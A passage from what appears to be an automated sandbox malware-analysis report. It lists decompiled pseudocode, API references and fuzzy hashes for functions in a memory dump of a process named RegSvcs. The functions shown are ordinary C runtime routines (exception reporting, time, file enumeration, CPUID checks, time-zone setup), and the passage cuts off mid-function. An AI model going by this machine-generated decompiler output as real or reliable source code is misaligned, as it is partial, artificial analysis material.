				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x460120; // 0x5959051
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E004317C6(_t41);
					_pop(_t61);
				}
				E004343A0(_t66,  &_v804, 0, 0x50);
				E004343A0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E004317C6(_t57);
				}
				return E00431C58(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x004457fb
0x004457fb
0x004457fb
0x00445806
0x0044580b
0x0044580d
0x00445815
0x00445817
0x0044581a
0x0044581f
0x0044581f
0x0044582b
0x0044583e
0x0044584c
0x00445852
0x00445858
0x0044585e
0x00445864
0x0044586a
0x00445870
0x00445876
0x0044587c
0x00445882
0x00445889
0x00445890
0x00445897
0x0044589e
0x004458a5
0x004458ac
0x004458ad
0x004458b6
0x004458bc
0x004458bf
0x004458c5
0x004458d2
0x004458db
0x004458e4
0x004458ed
0x004458fb
0x004458fd
0x00445912
0x0044591e
0x00445921
0x00445926
0x00445933

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004458F3
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004458FD
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0044590A

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 98053d506734586dc88f3aa5aaab0f80a4ebd52d20ea99830d084ec3e23a34d8
Instruction ID: c4e119c6d8c75cc2a1489dc22cc155a16328d3846d3b26efaf0907cd9c2c3831
Opcode Fuzzy Hash: 98053d506734586dc88f3aa5aaab0f80a4ebd52d20ea99830d084ec3e23a34d8
Instruction Fuzzy Hash: 2031C2749012289BCF21DF25D8897CDBBB8BF18310F5041EAE80CA72A1E7749F858F48

Uniqueness

Uniqueness Score: -1.00%

Function 0043DCD1 Relevance: 3.0, APIs: 2, Instructions: 44
timeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0043DCD1(void* __ecx, signed int __edx, signed int* _a4) {
				struct _FILETIME _v12;
				signed int _t10;
				signed int* _t15;
				signed int _t16;
				signed int _t23;
				void* _t25;

				_t16 = __edx;
				_v12.dwLowDateTime = 0;
				_v12.dwHighDateTime = 0;
				GetSystemTimeAsFileTime( &_v12);
				asm("sbb eax, 0x19db1de");
				_t10 = E00449CA0(_v12.dwLowDateTime - 0xd53e8000, _v12.dwHighDateTime, 0x989680, 0);
				_t25 = _t16 - 7;
				if(_t25 > 0 || _t25 >= 0 && _t10 > 0x93582aff) {
					_t10 = _t10 | 0xffffffff;
					_t16 = _t10;
				}
				_t15 = _a4;
				_t23 = _t10;
				if(_t15 != 0) {
					 *_t15 = _t10;
					_t15[1] = _t16;
				}
				return _t23;
			}

0x0043dcd1
0x0043dce0
0x0043dce3
0x0043dce6
0x0043dcfe
0x0043dd05
0x0043dd0a
0x0043dd0d
0x0043dd1c
0x0043dd1f
0x0043dd21
0x0043dd23
0x0043dd26
0x0043dd2a
0x0043dd2c
0x0043dd2e
0x0043dd2e
0x0043dd38

APIs

GetSystemTimeAsFileTime.KERNEL32(00417A7F,FFFFFFF9,4ECDC7B4,?,?,?,00417A7F,00000000), ref: 0043DCE6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043DD05

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 56b6881069dfa092313fe6bfce34fd8bda9b3df6a01b7f78ae9cf653b452fc95
Instruction ID: d51c3a3bd26551b335be7485fc821df9894727dd3b2a8fdb5404a5f51356e770
Opcode Fuzzy Hash: 56b6881069dfa092313fe6bfce34fd8bda9b3df6a01b7f78ae9cf653b452fc95
Instruction Fuzzy Hash: 7EF0D1B1E002187B4B24DF2D984599FBEE9EE8D360B25425AF819D3340E574CD01C294

Uniqueness

Uniqueness Score: -1.00%

Function 004493C8 Relevance: 1.7, APIs: 1, Instructions: 158
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004493C8(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char* _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				signed int _v612;
				signed int _v616;
				intOrPtr _v620;
				char* _v648;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				void* _t49;
				signed int _t52;
				signed char _t54;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				int _t70;
				void* _t84;
				void* _t86;
				void* _t90;
				union _FINDEX_INFO_LEVELS _t91;
				signed int* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t97;
				intOrPtr _t100;
				void* _t102;
				char* _t103;
				void* _t111;
				signed int _t116;
				WCHAR* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;
				void* _t129;
				signed int _t130;
				void* _t131;

				_push(__ecx);
				_t97 = _a4;
				_t111 = _t97 + 2;
				do {
					_t44 =  *_t97;
					_t97 = _t97 + 2;
				} while (_t44 != 0);
				_t116 = _a12;
				_t100 = (_t97 - _t111 >> 1) + 1;
				_v8 = _t100;
				if(_t100 <=  !_t116) {
					_t90 = _t116 + 1 + _t100;
					_t122 = E004477F0(_t90, 2);
					_t102 = _t121;
					if(_t116 == 0) {
						L7:
						_push(_v8);
						_t90 = _t90 - _t116;
						_t49 = E00448AB5(_t102, _t122 + _t116 * 2, _t90, _a4);
						_t130 = _t129 + 0x10;
						if(_t49 != 0) {
							goto L12;
						} else {
							_t119 = _a16;
							_t94 = E00449341(_t119);
							if(_t94 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_t119 + 4)))) = _t122;
								 *((intOrPtr*)(_t119 + 4)) =  *((intOrPtr*)(_t119 + 4)) + 4;
								_t94 = 0;
							} else {
								E004456E4(_t122);
							}
							E004456E4(0);
							_t84 = _t94;
							goto L4;
						}
					} else {
						_push(_t116);
						_t86 = E00448AB5(_t102, _t122, _t90, _a8);
						_t130 = _t129 + 0x10;
						if(_t86 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004457C7();
							asm("int3");
							_t128 = _t130;
							_t131 = _t130 - 0x264;
							_t52 =  *0x460120; // 0x5959051
							_v48 = _t52 ^ _t130;
							_t112 = _v32;
							_t103 = _v28;
							_push(_t90);
							_push(_t122);
							_push(_t116);
							_t117 = _v36;
							_v648 = _t103;
							if(_t112 != _t117) {
								while(E004495F2( *_t112 & 0x0000ffff) == 0) {
									_t112 = _t112 - 2;
									if(_t112 != _t117) {
										continue;
									}
									break;
								}
								_t103 = _v612;
							}
							_t123 =  *_t112 & 0x0000ffff;
							if(( *_t112 & 0x0000ffff) != 0x3a) {
								L21:
								_t103 =  &_v605;
								_t54 = E004495F2(_t123);
								_t112 = (_t112 - _t117 >> 1) + 1;
								asm("sbb eax, eax");
								_t91 = 0;
								_v616 =  ~(_t54 & 0x000000ff) & _t112;
								_t124 = FindFirstFileExW(_t117, 0,  &_v604, 0, 0, 0);
								if(_t124 != 0xffffffff) {
									_t92 = _v612;
									_v612 = _t92[1] -  *_t92 >> 2;
									_t63 = 0x2e;
									do {
										if(_v604.cFileName != _t63 || _v558 != 0 && (_v558 != _t63 || _v556 != 0)) {
											_push(_t92);
											_t65 = E004493C8(_t103,  &(_v604.cFileName), _t117, _v616);
											_t131 = _t131 + 0x10;
											_v620 = _t65;
											if(_t65 != 0) {
												FindClose(_t124);
												_t67 = _v620;
											} else {
												goto L29;
											}
										} else {
											goto L29;
										}
										goto L34;
										L29:
										_t70 = FindNextFileW(_t124,  &_v604);
										_t63 = 0x2e;
									} while (_t70 != 0);
									_t112 =  *_t92;
									_t106 = _v612;
									_t73 = _t92[1] -  *_t92 >> 2;
									if(_v612 != _t92[1] -  *_t92 >> 2) {
										E00451660(_t112, _t112 + _t106 * 4, _t73 - _t106, 4, E00449616);
									}
									FindClose(_t124);
									_t67 = 0;
								} else {
									_push(_v612);
									goto L20;
								}
							} else {
								_t22 =  &(_t117[1]); // 0x2
								if(_t112 == _t22) {
									goto L21;
								} else {
									_push(_t103);
									_t91 = 0;
									L20:
									_t67 = E004493C8(_t103, _t117, _t91, _t91);
								}
							}
							L34:
							_pop(_t118);
							_pop(_t125);
							_pop(_t93);
							return E00431C58(_t67, _t93, _v12 ^ _t128, _t112, _t118, _t125);
						} else {
							goto L7;
						}
					}
				} else {
					_t84 = 0xc;
					L4:
					return _t84;
				}
			}

0x004493cd
0x004493ce
0x004493d5
0x004493d8
0x004493d8
0x004493db
0x004493de
0x004493e3
0x004493ec
0x004493ef
0x004493f4
0x00449401
0x0044940b
0x0044940e
0x00449411
0x00449425
0x00449425
0x00449428
0x00449432
0x00449437
0x0044943c
0x00000000
0x0044943e
0x0044943e
0x00449448
0x0044944c
0x0044945a
0x0044945c
0x00449460
0x0044944e
0x0044944f
0x00449454
0x00449464
0x0044946a
0x00000000
0x0044946c
0x00449413
0x00449413
0x00449419
0x0044941e
0x00449423
0x0044946f
0x00449471
0x00449472
0x00449473
0x00449474
0x00449475
0x00449476
0x0044947b
0x0044947f
0x00449481
0x00449487
0x0044948e
0x00449491
0x00449494
0x00449497
0x00449498
0x00449499
0x0044949a
0x0044949d
0x004494a5
0x004494a7
0x004494ba
0x004494bf
0x00000000
0x00000000
0x00000000
0x004494bf
0x004494c1
0x004494c1
0x004494c7
0x004494cd
0x004494e9
0x004494ea
0x004494f0
0x004494fc
0x004494ff
0x00449501
0x00449508
0x0044951d
0x00449522
0x0044952c
0x0044953c
0x00449542
0x00449543
0x0044954a
0x00449569
0x00449578
0x0044957d
0x00449580
0x00449588
0x004495d7
0x004495dd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044958a
0x00449592
0x0044959c
0x0044959c
0x004495a2
0x004495a6
0x004495ac
0x004495b1
0x004495cc
0x004495d1
0x004495b4
0x004495ba
0x00449524
0x00449524
0x00000000
0x00449524
0x004494cf
0x004494cf
0x004494d4
0x00000000
0x004494d6
0x004494d6
0x004494d7
0x004494d9
0x004494dc
0x004494e1
0x004494d4
0x004495e3
0x004495e6
0x004495e7
0x004495ea
0x004495f1
0x00000000
0x00000000
0x00000000
0x00449423
0x004493f6
0x004493f8
0x004493f9
0x004493fc
0x004493fc

APIs

Part of subcall function 004477F0: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,004448D1,00000001,00000364,00000006,000000FF,?,?,?,00434DF5,FFFFFF09,?), ref: 00447831

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00449517
FindNextFileW.KERNEL32(00000000,?), ref: 00449592
FindClose.KERNEL32(00000000), ref: 004495B4

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Find$File$AllocateCloseFirstHeapNext
String ID:
API String ID: 2963102669-0
Opcode ID: b4c67050384638c4d176e1b9e60183c52dcd4d9bb40bacfa07d95e97fe341221
Instruction ID: 235fe675e2fe69c3e72e0840a60302f578e2736f357087a59cbd471ef786e52a
Opcode Fuzzy Hash: b4c67050384638c4d176e1b9e60183c52dcd4d9bb40bacfa07d95e97fe341221
Instruction Fuzzy Hash: 0E417C726002196FFB149FA9CC81DBF736DEFC5318F14416FF90593281EA389D059658

Uniqueness

Uniqueness Score: -1.00%

Function 00431A78 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00431A78(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x460ca0 =  *0x460ca0 & 0x00000000;
				 *0x460128 =  *0x460128 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x460ca4; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x460ca4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x460128; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x460ca0 = 1;
					 *0x460128 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x460ca0 = 2;
						 *0x460128 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x460128; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x460ca0 = 3;
								 *0x460128 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x460ca0 = 5;
									 *0x460128 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x460128 =  *0x460128 | 0x00000040;
										 *0x460ca0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x460ca4; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x460ca4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00431a78
0x00431a7b
0x00431a85
0x00431a96
0x00431c48
0x00431c4b
0x00431c4b
0x00431a9c
0x00431aa2
0x00431aa7
0x00431aab
0x00431aaf
0x00431ab1
0x00431ab3
0x00431ab6
0x00431abb
0x00431ac4
0x00431ad5
0x00431ae0
0x00431ae6
0x00431ae7
0x00431aed
0x00431af0
0x00431afa
0x00431afd
0x00431b00
0x00431b03
0x00431b48
0x00431b48
0x00431b4e
0x00431b4e
0x00431b53
0x00431b54
0x00431b5a
0x00431b8c
0x00431b5c
0x00431b5e
0x00431b5f
0x00431b65
0x00431b68
0x00431b6a
0x00431b6d
0x00431b70
0x00431b73
0x00431b76
0x00431b7f
0x00431b84
0x00431b84
0x00431b7f
0x00431b8f
0x00431b94
0x00431b97
0x00431ba1
0x00431bac
0x00431bb2
0x00431bb5
0x00431bbf
0x00431bca
0x00431bd6
0x00431bd9
0x00431bdc
0x00431be7
0x00431bec
0x00431bee
0x00431bf3
0x00431bf6
0x00431c00
0x00431c08
0x00431c0d
0x00431c17
0x00431c25
0x00431c38
0x00431c3f
0x00431c3f
0x00431c25
0x00431c08
0x00431bec
0x00431bca
0x00000000
0x00431c47
0x00431b08
0x00431b12
0x00431b37
0x00431b3d
0x00431b40
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00431A8E

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 799783290ef92b90eebe965a6e4fbe5650fdad6dc3099712c785b8510db8a875
Instruction ID: 5714c3705f73bc418ec7c7f6e0657a62b7cc660c2ea74e7bcf2721935246234d
Opcode Fuzzy Hash: 799783290ef92b90eebe965a6e4fbe5650fdad6dc3099712c785b8510db8a875
Instruction Fuzzy Hash: 34515BB1A012058FDB29CF54D8817AFBBF0FB49310F24952AD441EB361EBB9A940CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044B042 Relevance: 1.6, APIs: 1, Instructions: 140
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0044B042(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v104;
				intOrPtr _v108;
				intOrPtr* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				signed int _v168;
				char _v680;
				void* __edi;
				void* __esi;
				void* _t76;
				signed int _t82;
				signed int _t84;
				signed int _t90;
				signed int _t92;
				signed int _t95;
				void* _t96;
				signed int _t99;
				signed int _t100;
				void* _t101;
				void* _t105;
				signed int _t107;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				void* _t120;
				void* _t121;
				signed int _t127;
				signed int _t130;
				signed short _t132;
				void* _t133;
				void* _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				signed int _t142;
				signed int _t144;
				long _t146;
				signed int* _t149;
				signed int _t150;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t164;
				intOrPtr* _t165;
				void* _t167;
				void* _t168;
				void* _t171;
				signed int _t180;
				signed int _t185;
				void* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr _t194;
				signed int _t195;
				signed short _t196;
				signed int _t197;
				signed int _t199;
				void* _t200;
				void* _t201;
				signed int _t202;
				void* _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				void* _t207;
				signed int _t208;
				void* _t210;
				signed int _t215;
				signed int _t219;
				void* _t220;
				signed int _t221;
				intOrPtr* _t222;
				signed int _t223;
				signed int _t232;
				void* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				signed int _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t244;
				signed int _t245;
				void* _t247;
				void* _t248;

				_push(0x20);
				_t76 = E00448AB5(__ecx, _a8, 0x40, _a4);
				_t242 = _t241 + 0x10;
				if(_t76 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004457C7();
					asm("int3");
					_t237 = _t242;
					_t243 = _t242 - 0xc;
					_push(__ebx);
					_t208 = E0044ABCB();
					_t164 = E0044AC55();
					_v32 = 0;
					_v36 = 0;
					_v40 = 0;
					_t82 = E0044AC29( &_v32);
					_t171 = _t207;
					__eflags = _t82;
					if(_t82 != 0) {
						L15:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E004457C7();
						asm("int3");
						_push(_t237);
						_t238 = _t243;
						_push(_v56);
						_t84 = E00448AB5(_t171, _v64, 0x40, _v68);
						_t244 = _t243 + 0x10;
						__eflags = _t84;
						if(__eflags != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004457C7();
							asm("int3");
							_push(_t238);
							_t239 = _t244;
							_t245 = _t244 - 0x1c;
							_push(_t164);
							_push(0);
							_push(_t208);
							_t165 = E0044ABCB();
							_v116 = _t165;
							_v120 = E0044AC55();
							_t215 = 0;
							_v124 = 0;
							_v104 = 0;
							_v108 = 0;
							_t90 = E0044AC29( &_v104);
							__eflags = _t90;
							if(_t90 != 0) {
								L66:
								_push(_t215);
								_push(_t215);
								_push(_t215);
								_push(_t215);
								_push(_t215);
								E004457C7();
								asm("int3");
								_push(_t239);
								_t240 = _t245;
								_t92 =  *0x460120; // 0x5959051
								_v168 = _t92 ^ _t240;
								 *0x460b3c =  *0x460b3c | 0xffffffff;
								 *0x460b30 =  *0x460b30 | 0xffffffff;
								_push(_t215);
								_push(_t208);
								 *0x4617f8 = 0;
								_t95 = E0044AFCB(_t165, _t215, __eflags,  &_v680);
								asm("sbb esi, esi");
								_t219 =  ~(_t95 -  &_v680) & _t95;
								__eflags = _t95;
								if(_t95 == 0) {
									L70:
									L3();
								} else {
									__eflags =  *_t95;
									if( *_t95 == 0) {
										goto L70;
									} else {
										_push(_t95);
										L19();
									}
								}
								_t96 = E004456E4(_t219);
								_pop(_t210);
								__eflags = _v24 ^ _t240;
								_pop(_t220);
								return E00431C58(_t96, _t165, _v24 ^ _t240, _t200, _t210, _t220);
							} else {
								_t99 = E0044ABD1( &_v24);
								__eflags = _t99;
								if(_t99 != 0) {
									goto L66;
								} else {
									_t100 =  *0x4618ac;
									_t208 = _v8;
									__eflags = _t100;
									if(_t100 == 0) {
										L30:
										_t180 = _t208;
										_t201 = _t180 + 2;
										do {
											_t101 =  *_t180;
											_t180 = _t180 + 2;
											__eflags = _t101 - _t215;
										} while (_t101 != _t215);
										_t221 = E0044602F(2 + (_t180 - _t201 >> 1) * 2);
										__eflags = _t221;
										if(_t221 != 0) {
											E004456E4( *0x4618ac);
											_t185 = _t208;
											 *0x4618ac = _t221;
											_t200 = _t185 + 2;
											do {
												_t105 =  *_t185;
												_t185 = _t185 + 2;
												__eflags = _t105 - _v40;
											} while (_t105 != _v40);
											_t107 = E00448A51(_t221, (_t185 - _t200 >> 1) + 1, _t208);
											_t245 = _t245 + 0xc;
											__eflags = _t107;
											if(_t107 != 0) {
												_t215 = 0;
												__eflags = 0;
												goto L66;
											} else {
												_t222 = _v36;
												E004343A0(_t208,  *_t222, _t107, 0x80);
												E004343A0(_t208,  *((intOrPtr*)(_t222 + 4)), 0, 0x80);
												E004343A0(_t208,  *_t165, 0, 0x40);
												E004343A0(_t208,  *((intOrPtr*)(_t165 + 4)), 0, 0x40);
												_push(3);
												_push( *_t165);
												_push( *_t222);
												_push(_t208);
												L16();
												_t247 = _t245 + 0x40;
												__eflags = 0;
												_t115 = 3;
												do {
													__eflags =  *_t208;
													if( *_t208 != 0) {
														_t208 = _t208 + 2;
														__eflags = _t208;
													}
													_t115 = _t115 - 1;
													__eflags = _t115;
												} while (_t115 != 0);
												_t116 =  *_t208 & 0x0000ffff;
												_v44 = _t116;
												_t190 = 0x2d;
												__eflags = _t116 - _t190;
												if(_t116 == _t190) {
													_t208 = _t208 + 2;
													__eflags = _t208;
												}
												_t118 = E0045239E(_t208,  &_v28, 0xa);
												_t248 = _t247 + 0xc;
												_t223 = _t118 * 0xe10;
												__eflags = _t223;
												_v20 = _t223;
												while(1) {
													_t191 =  *_t208 & 0x0000ffff;
													__eflags = _t191 - 0x2b;
													if(_t191 == 0x2b) {
														goto L47;
													}
													__eflags = _t191 - 0x30 - 9;
													if(_t191 - 0x30 <= 9) {
														goto L47;
													}
													_t120 = 0x3a;
													__eflags = _t191 - _t120;
													if(_t191 == _t120) {
														_t208 = _t208 + 2;
														_t130 = E0045239E(_t208,  &_v28, 0xa);
														_t248 = _t248 + 0xc;
														_t194 = 0x30;
														_t223 = _v20 + _t130 * 0x3c;
														_v40 = _t194;
														_t132 =  *_t208 & 0x0000ffff;
														_v20 = _t223;
														_t202 = _t132;
														__eflags = _t132 - _t194;
														if(_t132 >= _t194) {
															_t196 = _t132;
															_t168 = 0x39;
															while(1) {
																_t202 = _t196 & 0x0000ffff;
																__eflags = _t196 - _t168;
																if(_t196 > _t168) {
																	break;
																}
																_t208 = _t208 + 2;
																_t138 =  *_t208 & 0x0000ffff;
																_t196 = _t138;
																_t202 = _t138;
																__eflags = _t138 - _v40;
																if(_t138 >= _v40) {
																	continue;
																}
																break;
															}
															_t165 = _v32;
														}
														_t133 = 0x3a;
														__eflags = _t202 - _t133;
														if(_t202 == _t133) {
															_t208 = _t208 + 2;
															_t135 = E0045239E(_t208,  &_v28, 0xa);
															_t248 = _t248 + 0xc;
															_t223 = _v20 + _t135;
															_t136 =  *_t208 & 0x0000ffff;
															_v20 = _t223;
															_t203 = 0x30;
															__eflags = _t136 - _t203;
															if(_t136 >= _t203) {
																_t195 = _t136;
																_t167 = 0x39;
																while(1) {
																	__eflags = _t195 - _t167;
																	if(_t195 > _t167) {
																		break;
																	}
																	_t208 = _t208 + 2;
																	_t137 =  *_t208 & 0x0000ffff;
																	_t195 = _t137;
																	__eflags = _t137 - _t203;
																	if(_t137 >= _t203) {
																		continue;
																	}
																	break;
																}
																_t165 = _v32;
															}
														}
													}
													_t121 = 0x2d;
													__eflags = _v44 - _t121;
													if(_v44 == _t121) {
														_t223 =  ~_t223;
														_v20 = _t223;
													}
													_t192 =  *_t208 & 0x0000ffff;
													__eflags = _t192;
													_v24 = 0 | _t192 != 0x00000000;
													__eflags = _t192;
													if(_t192 != 0) {
														_push(3);
														_push( *((intOrPtr*)(_t165 + 4)));
														_push( *((intOrPtr*)(_v36 + 4)));
														_push(_t208);
														L16();
														_t223 = _v20;
													}
													 *(E0044ABC5()) = _t223;
													 *(E0044ABB9()) = _v24;
													goto L33;
													L47:
													_t208 = _t208 + 2;
												}
											}
										} else {
											L33:
											__eflags = 0;
											_t127 = E004456E4(0);
											goto L34;
										}
									} else {
										_t197 = _t208;
										while(1) {
											_t204 =  *_t197;
											__eflags = _t204 -  *_t100;
											if(_t204 !=  *_t100) {
												break;
											}
											__eflags = _t204;
											if(_t204 == 0) {
												L27:
												_t127 = _t215;
											} else {
												_t205 =  *((intOrPtr*)(_t197 + 2));
												__eflags = _t205 -  *((intOrPtr*)(_t100 + 2));
												if(_t205 !=  *((intOrPtr*)(_t100 + 2))) {
													break;
												} else {
													_t197 = _t197 + 4;
													_t100 = _t100 + 4;
													__eflags = _t205;
													if(_t205 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											__eflags = _t127;
											if(_t127 == 0) {
												L34:
												return _t127;
											} else {
												goto L30;
											}
											goto L72;
										}
										asm("sbb eax, eax");
										_t127 = _t100 | 0x00000001;
										__eflags = _t127;
										goto L29;
									}
								}
							}
						} else {
							return E0044A6C3(E0043E313(_t200, __eflags), _t84, _v0, _a8, _a4, 0x3f, _t84, _t84);
						}
					} else {
						_t142 = E0044ABD1( &_v16);
						_pop(_t171);
						__eflags = _t142;
						if(_t142 != 0) {
							goto L15;
						} else {
							_t144 = E0044ABFD( &_v20);
							_pop(_t171);
							__eflags = _t144;
							if(_t144 != 0) {
								goto L15;
							} else {
								E004456E4( *0x4618ac);
								 *0x4618ac = 0;
								_t146 = GetTimeZoneInformation(0x461800);
								__eflags = _t146 - 0xffffffff;
								if(_t146 != 0xffffffff) {
									_t206 = 0x461800->Bias * 0x3c;
									_t199 = 1;
									__eflags =  *0x461846; // 0x0
									_t232 =  *0x461854; // 0x0
									 *0x4617f8 = 1;
									_v12 = _t206;
									if(__eflags != 0) {
										_t161 = _t232 * 0x3c + _t206;
										__eflags = _t161;
										_v12 = _t161;
									}
									__eflags =  *0x46189a;
									if( *0x46189a == 0) {
										L12:
										_t150 = 0;
										_t199 = 0;
										__eflags = 0;
									} else {
										_t158 =  *0x4618a8; // 0x0
										__eflags = _t158;
										if(_t158 == 0) {
											goto L12;
										} else {
